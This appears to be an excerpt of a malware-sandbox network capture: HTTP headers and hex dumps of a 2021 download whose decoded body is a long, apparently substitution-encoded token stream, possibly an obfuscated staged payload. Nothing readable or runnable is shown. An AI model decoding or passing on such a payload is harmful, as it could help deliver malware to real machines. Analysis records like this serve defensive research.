                                                                                                X-GUploader-UploadID: ADPycdt5fSirEYMb_NkxzZKC7t6tFfhYM04DPAmKMeDPJgfPgiJTBhU38u8ZzkjplNBvCv9YQAkb-5YryF3oMIp-UKg
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OFHaW%2BA1%2FEsf6iCDXu17GG4SoyohwUd7CF%2Fur4atLdhFR8LL54MMwNQSUVIxl1ynoSxxneHKR3XNzGmS8pYd842QFypg9pneVcSha5%2FXyjwZjTEQm5Y12YhLbHRSiICFWbbKqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:14 UTC5041INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:14 UTC5041INData Raw: 53 54 4d 67 69 50 70 6e 55 4f 2d 6e 6e 20 4f 53 20 54 69 69 20 53 20 67 20 53 20 53 20 53 20 69 20 53 20 53 20 53 20 4d 50 50 20 4d 50 50 20 53 20 53 20 54 55 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 70 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 4d 55 20 53 20 53 20 53 20 54 69 20 67 54 20 54 55 70 20 54 69 20 53 20 54 55 53 20 4f 20 4d 53 50 20 67 67 20 54 55 69 20 54 20 6e 70 20 4d 53 50 20 67 67 20 55 69 20 54 53 69 20 54 53 50 20 54 54 50 20 67 4d 20 54 54 4d 20 54 54 69 20 54 54 54 20 54 53 67 20 54 54 69 20 4f 6e 20 54 53 4f 20 67 4d 20 4f 4f 20 4f 6e 20 54 54 53 20 54
                                                                                                Data Ascii: STMgiPpnUO-nn OS Tii S g S S S i S S S MPP MPP S S TUi S S S S S S S pi S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S TMU S S S Ti gT TUp Ti S TUS O MSP gg TUi T np MSP gg Ui TSi TSP TTP gM TTM TTi TTT TSg TTi On TSO gM OO On TTS T
                                                                                                2021-10-26 15:35:14 UTC5043INData Raw: 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 4d 50 20 69 53 20 4d 4d 4f 20 54 53 4f 20 54 54 50 20 50 53 20 69 55 20 50 53 20 50 53 20 55 69 20 54 54 69 20 54 54 6e 20 54 69 70 20 54 69 67 20 50 53 20 69 55 20 54 67 55 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 54 4d 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20
                                                                                                Data Ascii: S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S MP iS MMO TSO TTP PS iU PS PS Ui TTi TTn Tip Tig PS iU TgU Pi Ui TTi TTn TSO TTM PS TTM PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS Pi
                                                                                                2021-10-26 15:35:14 UTC5044INData Raw: 20 4d 69 50 20 50 50 20 55 69 20 54 54 69 20 55 50 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 55 20 50 54 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 54 55 20 50 69 20 55 69 20 54 55 20 4f 54 20 67 54 20 4d 54 20 4f 69 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 69 55 20 69 4f 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 50 67 20 54 53 4f 20 54 54 4d 20 54 54 4d 20 67 53 20 70 69 20 70 4f 20 67 55
                                                                                                Data Ascii: MiP PP Ui TTi UP TSO TTM PS MiU PT Pi Ui TTM TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU TU Pi Ui TU OT gT MT Oi OP UT Pi Ui TMp TTn TSO TTM PS iU iU Pi Ui TTM TTn TSO TTM MiU iO PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi Pg TSO TTM TTM gS pi pO gU
                                                                                                2021-10-26 15:35:14 UTC5045INData Raw: 4d 20 54 54 70 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 69 20 50 69 20 55 69 20 54 4d 53 20 4f 50 20 54 53 4f 20 4f 4f 20 4d 20 69 4f 20 50 53 20 70 54 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 54 54 4d 20 50 53 20 67 67 20 6e 70 20 50 4d 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 6e 6e 20 50 53 20 69 55 20 50 70 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 55 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 50 69 20 55 53 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 69 20 69 4f 20 69 55 20 50 53 20 50 53 20 50 4f 20 6e 70 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 69 20 69 55 20 67 67 20 70 20 55 50 20 54 54 69 20 54 4d 70 20 54 53 4f 20 54 54 4d 20 50 53 20 50 67 20 50 53 20 50 69 20 70 4f 20 54 4d 20 54 54 67 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50
                                                                                                Data Ascii: M TTp TSO TTM Pi OP Ti Pi Ui TMS OP TSO OO M iO PS pT Ui TTi TTn TTS TTM PS gg np PM Ui TTi TTg M nn PS iU Pp MU Ui On pO TSU TTM Pn iU PS Pi US TTi TTn TMi Ti iO iU PS PS PO np TTn TSO TMM Mi iU gg p UP TTi TMp TSO TTM PS Pg PS Pi pO TM TTg TSO TTM Pi OP
                                                                                                2021-10-26 15:35:14 UTC5047INData Raw: 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 53 4d 20 54 4f 54 20 54 50 50 20 50 53 20 50 69 20 55 50 20 4f 53 20 70 54 20 54 53 4f 20 54 54 4d 20 50 70 20 70 6e 20 54 4d 67 20 50 69 20 55 69 20 54 4d 53 20 54 50 20 67 53 20 50 55 20 50 53 20 69 55 20 50 70 20 67 50 20 54 4d 54 20 54 54 67 20 55 67 20 6e 53 20 54 54 4f 20 54 6e 55 20 50 70 20 50 53 20 50 69 20 55 53 20 55 4f 20 54 54 6e 20 54 4f 20 54 4d 53 20 50 53 20 69 55 20 50 69 20 4d 67 53 20 4f 4d 20 54 54 69 20 54 54 6e 20 54 54 55 20 55 55 20 54 54 70 20 69 55 20 50 53 20 70 53 20 70 69 20 4d 4f 20 70 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 69 20 50 69 20 50 69 20 55 69 20 55 4f 20 54 54 53 20 70 69 20 54 54 55 20 4d 53 20 4d 67 6e 20 6e 55 20 50 69 20 55 69 20 54 54 69
                                                                                                Data Ascii: ii gS TnT TTi TTn TSn TSM TOT TPP PS Pi UP OS pT TSO TTM Pp pn TMg Pi Ui TMS TP gS PU PS iU Pp gP TMT TTg Ug nS TTO TnU Pp PS Pi US UO TTn TO TMS PS iU Pi MgS OM TTi TTn TTU UU TTp iU PS pS pi MO pM TSO TTM Pp Mi Pi Pi Ui UO TTS pi TTU MS Mgn nU Pi Ui TTi
                                                                                                2021-10-26 15:35:14 UTC5048INData Raw: 54 54 69 20 6e 50 20 55 55 20 54 53 67 20 69 55 20 50 53 20 70 53 20 54 4d 70 20 55 69 20 4f 69 20 54 50 69 20 54 54 4d 20 69 4f 20 53 20 50 70 20 50 69 20 4f 54 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 55 20 54 53 54 20 55 55 20 54 53 70 20 55 70 20 4d 70 20 54 54 67 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 67 50 20 50 53 20 67 50 20 4d 20 50 53 20 55 69 20 54 54 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 67 20 4f 55 20 70 69 20 4f 55 20 4d 53 20 50 54 20 67 4f 20 69 67 20 54 4d 54 20 54 4d 50 20 55 67 20 70 4f 20 67 69 20 50 53 20 69 55 20 50 70 20 67 53 20 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d 6e 20 4d 4d 4d 20
                                                                                                Data Ascii: TTi nP UU TSg iU PS pS TMp Ui Oi TPi TTM iO S Pp Pi OT TTi TTn TSO TTM PS iU PS PM nU TST UU TSp Up Mp TTg PS Pi Oi UU Ug nS TgP PS gP M PS Ui TTT TTn TSO TTM Pn iU PS gO Up TSg OU pi OU MS PT gO ig TMT TMP Ug pO gi PS iU Pp gS n TTi TTn TSg OS MS Mn MMM
                                                                                                2021-10-26 15:35:14 UTC5049INData Raw: 53 20 50 4f 20 67 6e 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 67 6e 20 50 54 20 50 69 20 55 4d 20 54 54 4d 20 4f 4f 20 4d 69 6e 20 69 20 50 70 20 69 55 20 50 53 20 69 50 20 6e 69 20 4f 50 20 54 4d 6e 20 6e 50 20 54 69 20 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 4f 70 20 4f 69 20 54 54 53 20 54 4d 4d 20 4d 50 20 54 4f 70 20 6e 70 20 53 20 55 69 20 54 54 69 20 54 54 67 20 54 53 6e 20 55 55 20 54 53 69 20 69 4f 20 50 53 20 69 55 20 54 4d 54 20 54 54 55 20 4f 55 20 54 53 4d 20 4f 54 20 69 55 20 67 55 20 50 6e 20 69 4f 20 54 4d 69 20 54 53 4f 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 69 20 67 50 20 4d 20 50 67 20 55 69 20 70 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 69 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 53 20 4d 67 4f 20 4d 53 20 70 70
                                                                                                Data Ascii: S PO gn TTn TSO TMM Mp gn PT Pi UM TTM OO Min i Pp iU PS iP ni OP TMn nP Ti P iU PS PS TMS Op Oi TTS TMM MP TOp np S Ui TTi TTg TSn UU TSi iO PS iU TMT TTU OU TSM OT iU gU Pn iO TMi TSO TTn TSO TTU Mi gP M Pg Ui pT TTn TSO TTM gi iU PS gO Up TSS MgO MS pp
                                                                                                2021-10-26 15:35:14 UTC5051INData Raw: 55 20 6e 70 20 54 53 20 50 53 20 50 69 20 55 53 20 4d 4f 20 69 67 20 54 53 4f 20 54 54 4d 20 50 70 20 67 50 20 50 6e 20 54 69 20 54 4f 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4f 55 20 50 6e 20 4d 69 20 54 53 4f 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 55 20 67 50 20 50 50 20 6e 67 20 67 4f 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 54 70 20 50 53 20 69 55 20 50 70 20 4d 70 20 55 54 20 6e 69 20 53 20 54 53 4f 20 54 54 4d 20 50 53 20 67 4f 20 54 6e 55 20 70 67 20 55 69 20 54 54 69 20 54 54 67 20 6e 6e 20 4d 53 55 20 4d 50 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 6e 20 50 67 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4d 70 20 54 53 70
                                                                                                Data Ascii: U np TS PS Pi US MO ig TSO TTM Pp gP Pn Ti TOU TTi TTn TSO OU Pn Mi TSO Pi Ui TMS TSM TSp TTU gP PP ng gO Ui TTi TTg M Tp PS iU Pp Mp UT ni S TSO TTM PS gO TnU pg Ui TTi TTg nn MSU MP MMi ii gS TnT TTi TTn TSn On Pg nP gP Pi Ui TTU MiO gn TTM PS iO Mp TSp
                                                                                                2021-10-26 15:35:14 UTC5052INData Raw: 4d 55 20 50 6e 20 4d 6e 20 54 4f 50 20 70 4f 20 54 4d 53 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 4d 69 20 50 55 20 50 53 20 50 67 20 54 6e 4d 20 69 50 20 50 55 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 54 50 20 54 53 53 20 54 53 4f 20 54 54 4d 20 50 69 20 50 70 20 69 55 20 69 4f 20 70 6e 20 69 4d 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 67 20 70 54 20 69 55 20 50 53 20 50 53 20 4f 4d 20 54 54 4d 20 54 54 69 20 54 54 6e 20 69 53 20 54 70 55 20 70 55 20 54 50 67 20 50 69 20 55 69 20 54 54 50 20 55 20 54 4d 50 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 50 4d 20 55 67 20 54 53 6e 20 69 50 20 4d 69 6e 20 4f 20 54 55 20 69 55 20 50 53 20
                                                                                                Data Ascii: MU Pn Mn TOP pO TMS TTi TTn TSn TMi PU PS Pg TnM iP PU TTn TSO TTg pn TMS PS Pi UP TP TSS TSO TTM Pi Pp iU iO pn iM MgO MS pp PS iU PT nT TSM TTi TTn TSU Tg pT iU PS PS OM TTM TTi TTn iS TpU pU TPg Pi Ui TTP U TMP TTM PS PM PU PM Ug TSn iP Min O TU iU PS
                                                                                                2021-10-26 15:35:14 UTC5053INData Raw: 20 70 4f 20 54 53 53 20 54 54 4d 20 4d 50 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 4f 20 69 69 20 67 54 20 67 4f 20 54 54 69 20 55 69 20 54 54 4f 20 54 53 50 20 54 53 67 20 67 54 20 67 67 20 4d 53 20 54 70 20 55 70 20 54 54 4f 20 4f 55 20 70 69 20 4f 6e 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 4f 50 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 54 70 20 6e 6e 20 70 4d 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 54 67 50 20 54 67 20 70 67 20 69 55 20 50 53 20 50 53 20 54 4d 6e 20 54 50 4d 20 54 54 6e 20 54 4d 70 20 70 69 20 50 4d 20 69 55 20 54 55 54 20 50 69 20 55 69 20 54 54 69 20 4f 6e 20 54 53 4f 20 54 54 4d 20 67 50 20 50 53 20 67 6e 20 54 70 6e 20 70 70 20 4f 69 20 4f 69 20 6e 50 20 54 54 50 20 54 55
                                                                                                Data Ascii: pO TSS TTM MP iU PS Pi Ui TTi TTn TSO TTi iO ii gT gO TTi Ui TTO TSP TSg gT gg MS Tp Up TTO OU pi On MS MM Mi nP OP TTi TTn TSP OT MTp nn pM Pi Ui TTU Oi TgP Tg pg iU PS PS TMn TPM TTn TMp pi PM iU TUT Pi Ui TTi On TSO TTM gP PS gn Tpn pp Oi Oi nP TTP TU
                                                                                                2021-10-26 15:35:14 UTC5055INData Raw: 20 54 53 4d 20 67 4f 20 4d 4f 20 67 4d 20 54 70 20 69 6e 20 54 53 70 20 54 54 6e 20 54 53 4f 20 54 54 70 20 69 4f 20 69 50 20 67 70 20 4d 70 20 4f 69 20 55 69 20 4d 70 20 50 20 54 54 4d 20 50 53 20 50 55 20 4d 69 20 54 70 20 54 4d 6e 20 54 50 55 20 55 67 20 6e 53 20 54 67 4d 20 69 4f 20 53 20 50 70 20 50 69 20 54 53 53 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 70 20 54 53 69 20 55 55 20 54 53 67 20 55 70 20 6e 67 20 69 53 20 50 53 20 50 69 20 55 53 20 4f 50 20 54 54 50 20 6e 53 20 54 54 50 20 4d 53 20 4d 6e 20 54 4f 55 20 4d 55 20 55 70 20 54 54 54 20 54 53 50 20 70 69 20 4f 55 20 4d 53 20 6e 50 20 69 4d 20 50 69 20 55 69 20 54 54 55 20 54 54 55 20 54 4d 53 20 54 53 70 20 67 54 20 50 55 20 4d 53 20 55 4f 20
                                                                                                Data Ascii: TSM gO MO gM Tp in TSp TTn TSO TTp iO iP gp Mp Oi Ui Mp P TTM PS PU Mi Tp TMn TPU Ug nS TgM iO S Pp Pi TSS TTi TTn TSO TTM PS iU PS PM np TSi UU TSg Up ng iS PS Pi US OP TTP nS TTP MS Mn TOU MU Up TTT TSP pi OU MS nP iM Pi Ui TTU TTU TMS TSp gT PU MS UO
                                                                                                2021-10-26 15:35:14 UTC5056INData Raw: 69 20 54 50 67 20 4f 53 20 69 55 20 69 4d 20 67 6e 20 4d 6e 20 6e 54 20 55 69 20 54 69 20 54 54 70 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 69 53 20 6e 6e 20 4f 50 20 54 4d 70 20 6e 50 20 54 54 70 20 4f 67 20 4f 50 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 50 50 20 4d 53 20 4d 6e 20 54 4f 67 20 50 69 20 55 69 20 54 54 69 20 54 54 55 20 4f 67 20 54 4d 4d 20 50 53 20 4d 67 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 69 67 20 69 67 20 4d 6e 20 4f 69 20 55 69 20 54 69 20 54 54 4f 20 54 54 4d 20 50 53 20 50 4d 20 67 54 20 69 55 20 54 4d 6e 20 54 54 67 20 55 67 20 6e 53 20 54 67 4d 20 4d 69 20 50 53 20 69 4d 20 69 4d 20 54 4d 54 20 54 4d 70 20 55 67 20 4d 4d 20 54 53 70 20 50 53 20 69 55 20 50 69 20
                                                                                                Data Ascii: i TPg OS iU iM gn Mn nT Ui Ti TTp TTM PS PM iO iS nn OP TMp nP TTp Og OP PS Pi Oi UU Ug nS TPP MS Mn TOg Pi Ui TTi TTU Og TMM PS Mg PS Pi Ui TTi TTn TSO TTM iU ig ig Mn Oi Ui Ti TTO TTM PS PM gT iU TMn TTg Ug nS TgM Mi PS iM iM TMT TMp Ug MM TSp PS iU Pi
                                                                                                2021-10-26 15:35:14 UTC5057INData Raw: 54 54 6e 20 54 53 6e 20 54 54 70 20 67 70 20 69 4d 20 69 55 20 6e 6e 20 6e 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 54 20 67 70 20 69 55 20 50 53 20 50 53 20 55 54 20 4f 53 20 54 4f 69 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 70 20 50 53 20 50 69 20 55 69 20 54 54 67 20 70 4f 20 54 53 67 20 54 54 4d 20 70 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 50 20 69 70 20 69 67 20 67 54 20 69 4f 20 54 54 69 20 4f 53 20 4d 67 50 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 70 20 4d 53 20 4d 4f 20 54 70 67 20 54 54 69 20 54 54 54 20 70 4f 20 4d 67 6e 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 50 20 54 54 4d 20 54 70 4f 20 69 55 20 50 53 20 50 69 20 6e 70 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 53 50
                                                                                                Data Ascii: TTn TSn TTp gp iM iU nn nO TTi TTn TSP TT gp iU PS PS UT OS TOi TSO TTM PM Mp PS Pi Ui TTg pO TSg TTM pT iU PS Pi Ui TTi TTn TSO TTP ip ig gT iO TTi OS MgP TSO TTM PM Mp MS MO Tpg TTi TTT pO Mgn PS iU PM MU Ui On pO TSP TTM TpO iU PS Pi np TTi TTn TMi TSP
                                                                                                2021-10-26 15:35:14 UTC5059INData Raw: 6e 20 4d 67 55 20 69 70 20 50 55 20 54 4d 6e 20 54 55 4f 20 54 4d 53 20 6e 53 20 54 70 70 20 6e 4f 20 54 55 69 20 50 53 20 50 69 20 55 53 20 55 4f 20 54 70 4f 20 70 4f 20 70 53 20 50 53 20 69 55 20 50 70 20 67 4f 20 55 53 20 54 4d 54 20 4f 67 20 54 4d 20 54 54 4d 20 50 53 20 50 55 20 4d 67 70 20 50 69 20 55 67 20 55 55 20 54 53 4f 20 54 55 4f 20 54 54 67 20 67 69 20 69 55 20 50 53 20 50 69 20 55 69 20 54 4d 4d 20 54 54 6e 20 69 53 20 70 54 20 50 53 20 70 67 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 70 20 50 53 20 4f 70 20 50 53 20 50 69 20 55 69 20 54 53 50 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 70 6e 20 6e 4d 20 50 69 20 55 69 20 54 4d 53 20 54 54 53 20 70 69 20 54 4d 67 20 4d 53 20 50 50 20 4f 67 20 6e 50 20 55 69 20
                                                                                                Data Ascii: n MgU ip PU TMn TUO TMS nS Tpp nO TUi PS Pi US UO TpO pO pS PS iU Pp gO US TMT Og TM TTM PS PU Mgp Pi Ug UU TSO TUO TTg gi iU PS Pi Ui TMM TTn iS pT PS pg TTp Pi Ui TTP TSM Og TTp PS Op PS Pi Ui TSP TTn TSO On iU pn nM Pi Ui TMS TTS pi TMg MS PP Og nP Ui
                                                                                                2021-10-26 15:35:14 UTC5060INData Raw: 54 20 4d 54 54 20 50 55 20 4d 50 20 4d 54 55 20 70 4f 20 54 54 4f 20 4d 70 20 4d 67 6e 20 54 54 4d 20 50 53 20 50 55 20 50 55 20 4f 4d 20 54 67 20 54 54 70 20 4d 50 54 20 4d 54 55 20 4d 70 20 4d 70 20 6e 54 20 50 53 20 50 69 20 4f 69 20 4d 6e 20 54 53 4d 20 54 53 6e 20 4f 6e 20 50 50 20 50 69 20 50 55 20 67 4f 20 55 4d 20 4d 4f 20 4d 69 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 70 54 20 50 55 20 70 67 20 54 4d 20 54 4d 70 20 54 4d 50 20 54 53 6e 20 4d 50 69 20 54 67 67 20 67 20 4d 67 53 20 67 4f 20 55 54 20 4d 4f 20 54 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 50 69 20 4d 69 20 67 6e 20 54 53 53 20 54 54 4f 20 54 54 6e 20 70 4f 20 54 54 4d 20 50 53 20 69 55 20 69 50 20 50 69 20 55 69 20 4f 4f 20 54 54 4f 20 54 54 70 20 54 53 69 20 70 50 20 6e 53 20 50 53 20 50
                                                                                                Data Ascii: T MTT PU MP MTU pO TTO Mp Mgn TTM PS PU PU OM Tg TTp MPT MTU Mp Mp nT PS Pi Oi Mn TSM TSn On PP Pi PU gO UM MO Min TSO TTM Pp pT PU pg TM TMp TMP TSn MPi Tgg g MgS gO UT MO TM TSO TTM Pp Pi Mi gn TSS TTO TTn pO TTM PS iU iP Pi Ui OO TTO TTp TSi pP nS PS P
                                                                                                2021-10-26 15:35:14 UTC5061INData Raw: 20 4d 53 20 4d 4f 20 54 6e 67 20 54 54 4d 20 4f 55 20 54 54 4d 20 4f 67 20 50 55 20 4d 4d 20 4f 67 20 54 4d 54 20 55 69 20 54 54 69 20 54 54 50 20 6e 53 20 4f 4f 20 4d 53 20 4d 6e 20 54 4f 70 20 50 4d 20 6e 4f 20 54 53 53 20 55 4f 20 54 53 54 20 55 70 20 4f 67 20 4f 70 20 50 53 20 50 69 20 55 4d 20 55 4f 20 54 54 55 20 6e 50 20 4f 54 20 54 4f 70 20 4d 70 20 50 53 20 50 69 20 55 6e 20 70 70 20 54 4d 69 20 54 53 4f 20 4f 54 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 54 20 4d 67 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 54 50 20 4f 50 20 54 54 54 20 54 53 67 20 67 70 20 4d 55 20 67 70 20 54 70 20 54 54 69 20 54 54 4d 20 54 69 20 6e 50 20 54 54 4d 20 50 53 20 50 4d 20 67 70 20 50 4d 20 69 6e 20 55 70 20 54 54 6e
                                                                                                Data Ascii: MS MO Tng TTM OU TTM Og PU MM Og TMT Ui TTi TTP nS OO MS Mn TOp PM nO TSS UO TST Up Og Op PS Pi UM UO TTU nP OT TOp Mp PS Pi Un pp TMi TSO OT PS iU PS Pi Ui TTi TTn TTT TT Mg iU PS PS TMS TTP OP TTT TSg gp MU gp Tp TTi TTM Ti nP TTM PS PM gp PM in Up TTn
                                                                                                2021-10-26 15:35:14 UTC5063INData Raw: 55 69 20 54 54 69 20 54 54 6e 20 6e 4f 20 54 54 4d 20 50 53 20 67 67 20 69 55 20 6e 6e 20 54 4d 50 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 53 50 20 67 54 20 50 6e 20 4d 53 20 69 55 20 54 4d 69 20 4d 50 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 50 20 50 54 20 50 70 20 4d 4f 20 54 70 54 20 54 54 4d 20 54 69 20 70 55 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 55 4f 20 4d 54 70 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4d 20 4d 4f 20 50 53 20 6e 67 20 67 54 20 55 69 20 54 54 69 20 54 54 67 20 54 54 53 20 67 54 20 54 4f 54 20 69 55 20 50 53 20 70 53 20 55 53 20 4f 53 20 67 4f 20 54 53 4f 20 54 54 4d 20 50 70 20 4f 50 20 4f 6e 20 50 69 20 55 69 20 54 4d 53 20 55 4f 20 54 54 54 20 54 6e 69 20 54 54 67 20 50 53 20 6e 67 20 67 54 20 55 69 20 54 54 69 20 54 54
                                                                                                Data Ascii: Ui TTi TTn nO TTM PS gg iU nn TMP TTi TTn TSP TSP gT Pn MS iU TMi MPT TTn TSO TMM MP PT Pp MO TpT TTM Ti pU TTM PS PM iO UO MTp TTi TTn TSg OM MO PS ng gT Ui TTi TTg TTS gT TOT iU PS pS US OS gO TSO TTM Pp OP On Pi Ui TMS UO TTT Tni TTg PS ng gT Ui TTi TT
                                                                                                2021-10-26 15:35:14 UTC5064INData Raw: 67 20 54 70 69 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 4d 20 4f 67 20 50 4d 20 4d 4d 20 4d 50 20 54 4d 20 55 55 20 55 4f 20 54 50 67 20 54 53 4d 20 4f 54 20 4d 53 4d 20 50 70 20 67 4d 20 69 55 20 6e 53 20 54 54 50 20 4f 67 20 4d 50 69 20 54 54 4d 20 50 53 20 50 55 20 67 67 20 50 53 20 6e 53 20 54 54 55 20 4f 67 20 4d 69 4f 20 54 54 4d 20 50 53 20 50 55 20 67 4d 20 50 50 20 54 4d 69 20 4d 4d 50 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 67 20 50 67 20 67 4d 20 50 54 20 54 4d 69 20 4d 67 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 4f 55 20 50 53 20 50 69 20 4f 69 20 4f 53 20 4d 4d 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 67 67 20 50 4d 20 55 4f 20 54 4f 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 55 20 50 54 20 4d 69 20 54 6e 53 20 50 69 20 55 69 20
                                                                                                Data Ascii: g Tpi Ui TTi TMn TTM Og PM MM MP TM UU UO TPg TSM OT MSM Pp gM iU nS TTP Og MPi TTM PS PU gg PS nS TTU Og MiO TTM PS PU gM PP TMi MMP TTn TSO TMM gg Pg gM PT TMi MgT TTn TSO TMM Mp OU PS Pi Oi OS MMn TSO TTM Pp gg PM UO TOP TTi TTn TSg OU PT Mi TnS Pi Ui
